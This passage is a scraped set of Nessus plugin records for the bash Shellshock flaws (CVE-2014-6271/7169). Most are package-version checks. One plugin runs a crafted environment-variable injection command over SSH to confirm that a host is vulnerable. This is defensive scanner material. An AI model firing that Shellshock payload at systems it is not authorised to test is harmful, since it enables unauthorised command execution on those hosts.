value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:32", "description": "The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. Depending on the configuration of the system, an attacker can remotely execute arbitrary code.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-13T00:00:00", "type": "nessus", "title": "Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_CVE_2014_7169.NASL", "href": "https://www.tenable.com/plugins/nessus/78385", "sourceData": "#TRUSTED 66758a0ce9bdc48c16ab1dc198439eb01bb7d8460ee85e6b34730c189d24254d5d0ece733ba008bce5b40b3fa92bd4970a5011edabfe7f27ebc094f2633e010dbca7339c762580081df1bf3d056a610a1686e2ccdc1ff4e98d7b294fc886c6bdfab646d9f35cf34e9fcb85daa8e3672f621a122b2fb2aac8c932e162f21e1758f04d567310c04505ab652881d09621e2affacef2494570e48e784de58f525e56472a3121d465eef6728a38a1f881fb13a2768fbd3cfd3bf3a24df9b17c68c291c82fad3f2922ee44796123b242848824427eabbf4aeafb4846310cd1bc7069e8a237f9d2cda45626b031566df05ea980d8690815bf527a8c51be05dd714691b576d4e358549935108f6fc1219edfcb2803ca4f4b0ac059d4080abd496eb6ac1a8da2f65951650fe96e5a905f43299b5ca5fc00072ebd4c0d6a6be848a68b323973a78ec7bcdc384a8679289420cb714491b7c4b5a97005cc67855ac28cf3fdf23119f3ce24f7c587e0ca2fb60d9957fb3f3377dbb1e3676d380658dcc24aef7b62439dab9e983cac64751db2138f95500c364263464043ad038ae46c023966e036fb385ae12f3dcc728f8ff1a32299d6b5a8b161322764c2848c20c536c3f3828bd61e83c3380250b8591e2f99b365a8ddc623f26733446aeaa315ef7733480ad23144b6bda890e9f7e61a711b0f2e8511cf4f5a721360218872ab8b30152583\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78385);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker can remotely execute\narbitrary code.\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate updates.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"HostLevelChecks/proto\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude('ssh_func.inc');\ninclude('telnet_func.inc');\ninclude('hostlevel_funcs.inc');\ninclude('data_protection.inc');\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nvar proto = get_kb_item_or_exit('HostLevelChecks/proto');\n\nvar port = get_service(svc:\"ssh\", default:22, exit_on_fail:TRUE);\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\nvar info_t;\n\nif (proto == 'local')\n info_t = INFO_LOCAL;\nelse if (proto == 'ssh')\n{\n info_t = INFO_SSH;\n var ret = ssh_open_connection();\n if (!ret) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n}\nelse\n exit(0, 'This plugin only attempts to run commands locally or via SSH, and neither is available against the remote host.');\n\n var AIX_Check = get_kb_item(\"Host/AIX/version\");\n if (!isnull(AIX_Check) && AIX_Check =~ '^AIX-[0-5].')\n {\n if(info_t == INFO_SSH) ssh_close_connection();\n exit(0, \"Commands are not supported on AIX 5.1 and below\");\n }\nelse\n var command = \"cd /tmp && X='() { (a)=>\\' bash -c 'echo /usr/bin/id' && cat /tmp/echo && rm /tmp/echo\";\n var output = info_send_cmd(cmd:command);\n\n if(info_t == INFO_SSH) ssh_close_connection();\n if (output !~ \"uid=[0-9]+.*gid=[0-9]+.*\") audit(AUDIT_HOST_NOT, \"affected.\");\n\nvar report =\n '\\n' + 'Nessus was able to exploit a flaw in the patch for CVE-2014-7169' +\n '\\n' + 'and write to a file on the target system.' +\n '\\n' +\n '\\n' + 'File contents :' +\n '\\n' +\n '\\n' + data_protection::sanitize_uid(output:output) +\n '\\n' +\n '\\n' + 'Note: Nessus has attempted to remove the file from the /tmp directory.\\n';\nsecurity_report_v4(port:port,extra:report,severity:SECURITY_HOLE);\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T16:18:21", "description": "The remote host is running a version of Gaia OS which is affected by issues related to the SHELLSHOCK set of vulnerabilities in bash. An error in the bash functionality that evaluates specially formatted environment variables passed to it from another environment, which may result in remote code execution.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2017-12-04T00:00:00", "type": "nessus", "title": "Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:check_point:gaia_os"], "id": "CHECK_POINT_GAIA_SK102673.NASL", "href": "https://www.tenable.com/plugins/nessus/104997", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104997);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Gaia OS which is affected by issues\nrelated to the SHELLSHOCK set of vulnerabilities in bash. An error in the bash \nfunctionality that evaluates specially formatted environment variables passed \nto it from another environment, which may result in remote code execution.\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8d7a5ca\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk104443&partition=General&product=Security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba5b918a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to an unaffected version or apply vendor-supplied hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:check_point:gaia_os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"check_point_gaia_os_version.nbin\");\n script_require_keys(\"Host/Check_Point/version\", \"Host/Check_Point/installed_hotfixes\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Gaia Operating System\";\nversion = get_kb_item_or_exit(\"Host/Check_Point/version\");\nhfs = get_kb_item_or_exit(\"Host/Check_Point/installed_hotfixes\");\nvuln = FALSE;\n\nif (version =~ \"R7[01]\")\n{\n vuln = TRUE;\n fix = \"Upgrade to an unaffected version or contact Checkpoint support.\";\n}\nelse if (version =~ \"R75\\.4[0567]\" || version =~ \"R76\" || version =~ \"R77(\\.[12]0)?$\")\n{\n if(!(\"sk102673\" >< hfs && \"sk104443\" >< hfs))\n vuln = TRUE;\n fix = \"Apply Hotfix sk102673 or sk104443\";\n}\nelse\n audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n\nif(vuln)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fix : ' + fix +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:22", "description": "The remote host is affected by the vulnerability described in GLSA-201409-10 (Bash: Code Injection (Updated fix for GLSA 201409-09))\n\n Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code (CVE-2014-6271).\n Gentoo Linux informed about this issue in GLSA 201409-09.\n Tavis Ormandy reported that the patch for CVE-2014-6271 was incomplete.\n As such, this GLSA supersedes GLSA 201409-09.\n Impact :\n\n A remote attacker could exploit this vulnerability to execute arbitrary commands even in restricted environments.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "GLSA-201409-10 : Bash: Code Injection (Updated fix for GLSA 201409-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:bash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201409-10.NASL", "href": "https://www.tenable.com/plugins/nessus/77886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201409-10.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77886);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"GLSA\", value:\"201409-10\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GLSA-201409-10 : Bash: Code Injection (Updated fix for GLSA 201409-09)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201409-10\n(Bash: Code Injection (Updated fix for GLSA 201409-09))\n\n Stephane Chazelas reported that Bash incorrectly handles function\n definitions, allowing attackers to inject arbitrary code (CVE-2014-6271).\n Gentoo Linux informed about this issue in GLSA 201409-09.\n Tavis Ormandy reported that the patch for CVE-2014-6271 was incomplete.\n As such, this GLSA supersedes GLSA 201409-09.\n \nImpact :\n\n A remote attacker could exploit this vulnerability to execute arbitrary\n commands even in restricted environments.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201409-10\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Bash 3.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.1_p18-r1:3.1'\n All Bash 3.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.2_p52-r1:3.2'\n All Bash 4.0 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.0_p39-r1:4.0'\n All Bash 4.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.1_p12-r1:4.1'\n All Bash 4.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.2_p48-r1'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-shells/bash\", unaffected:make_list(\"rge 3.1_p18-r1\", \"rge 3.2_p52-r1\", \"rge 4.0_p39-r1\", \"rge 4.1_p12-r1\", \"ge 4.2_p48-r1\"), vulnerable:make_list(\"lt 4.2_p48-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:57", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169 ). With this update prefix and suffix for environment variable names which contain shell functions are added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are fixed which were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Debian DSA-3035-1 : bash - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bash", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3035.NASL", "href": "https://www.tenable.com/plugins/nessus/77882", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3035. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77882);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"DSA\", value:\"3035\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Debian DSA-3035-1 : bash - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 ). With this update prefix and\nsuffix for environment variable names which contain shell functions\nare added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762761\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-6271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/bash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2014/dsa-3035\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the bash packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.2+dfsg-0.1+deb7u3.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bash\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-builtins\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-doc\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-static\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:57:05", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169). With this update prefix and suffix for environment variable names which contain shell functions are added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are fixed which were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-63-1 : bash security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bash", "p-cpe:/a:debian:debian_linux:bash-builtins", "p-cpe:/a:debian:debian_linux:bash-doc", "p-cpe:/a:debian:debian_linux:bash-static", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-63.NASL", "href": "https://www.tenable.com/plugins/nessus/82208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-63-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82208);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Debian DLA-63-1 : bash security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). With this update prefix and\nsuffix for environment variable names which contain shell functions\nare added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2014/09/msg00020.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/squeeze-lts/bash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-builtins\");\n 